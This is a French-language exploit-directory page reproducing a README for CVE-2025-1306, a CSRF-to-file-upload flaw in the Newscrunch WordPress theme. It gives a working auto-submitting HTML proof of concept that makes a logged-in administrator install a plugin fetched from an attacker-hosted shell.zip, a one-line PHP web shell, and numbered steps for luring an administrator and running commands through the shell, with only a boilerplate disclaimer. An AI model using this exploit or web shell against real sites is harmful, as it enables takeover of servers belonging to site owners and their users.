Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-1306 — Newscrunch <= 1.8.4 - Falsification de requête intersite menant à un téléchargement arbitraire de fichier | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-1306
Outils de PhishingGénération de PayloadsExploitationExploitation d'Applications WebApprentissage et Éducation
GitHubnxploited/cve-2025-1306

CVE-2025-1306

Newscrunch <= 1.8.4 - Falsification de requête intersite menant à un téléchargement arbitraire de fichier

Voir le dépôt
5il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit Newscrunch (CVE-2025-1306)

🚨 Aperçu

Cet exploit cible une vulnérabilité de type Cross-Site Request Forgery (CSRF) vers un téléchargement arbitraire de fichiers (CVE-2025-1306) dans le thème Newscrunch WordPress. En raison de l'absence de validation de nonce dans la fonction newscrunch_install_and_activate_plugin(), un attaquant non authentifié peut inciter un administrateur connecté à télécharger des fichiers arbitraires sur le serveur, conduisant à une exécution de code à distance (RCE).


🔥 Détails de la vulnérabilité

  • ID CVE : CVE-2025-1306
  • Logiciel concerné : Thème Newscrunch WordPress (<= 1.8.4)
  • Classification CWE : CWE-352 - Cross-Site Request Forgery (CSRF)
  • Score CVSS : 8.8 (ÉLEVÉ)
  • Vecteur : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
  • Date de publication : 4 mars 2025

🛑 Sévérité et impact

  • ✅ Exécution de code à distance (RCE)
  • ✅ Compromission totale du système
  • ✅ Téléchargement arbitraire de fichiers basé sur CSRF
  • ✅ Vecteur d'attaque non authentifié

Exploitabilité : Nécessite qu'un administrateur visite un lien malveillant conçu.


📜 Code de l'exploit

Cet exploit force un administrateur authentifié à exécuter une attaque CSRF qui télécharge un fichier ZIP malveillant contenant un web shell.

🔹 PoC - Exploit HTML

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Exploit CVE-2025-1306 By Nxploit ,Khaled AlEnazi</title>
</head>
<body>
    <h2>Click anywhere to load content...</h2>

    <script>
        function sendExploit() {
            var form = document.createElement("form");
            form.method = "POST";
            form.action = "http://target.com/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin";

            var input = document.createElement("input");
            input.type = "hidden";
            input.name = "plugin_url";
            input.value = "http://attacker.com/shell.zip";

            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
        }

        
        window.onload = function() {
            sendExploit();
        };
    </script>
</body>
</html>

📌 Remplacez :

  • http://target.com/ par le site WordPress vulnérable
  • http://attacker.com/shell.zip par un payload ZIP malveillant contenant un web shell.

🔹 Exemple de shell PHP malveillant

root@kitploit:~
<?php system($_GET['cmd']); ?>

📌 Après une exploitation réussie, accédez au shell :

root@kitploit:~
http://target.com/wp-content/plugins/shell.php?cmd=whoami

🚀 Comment utiliser

  1. Hébergez le fichier HTML sur un site web contrôlé par l'attaquant.
  2. Envoyez le lien malveillant à un administrateur WordPress authentifié.
  3. Une fois que l'administrateur visite la page, le shell est téléchargé automatiquement.
  4. Exécutez des commandes à distance en utilisant :
    root@kitploit:~
    http://target.com/wp-content/plugins/shell.php?cmd=ls
    

⚠️ Avertissement

Cet outil est destiné uniquement à des fins éducatives et de recherche en sécurité. L'exploitation non autorisée de vulnérabilités est illégale et punissable par la loi. L'auteur n'est pas responsable de toute mauvaise utilisation ou des dommages causés par cet outil. Utilisez-le de manière responsable.


Télécharger l’outil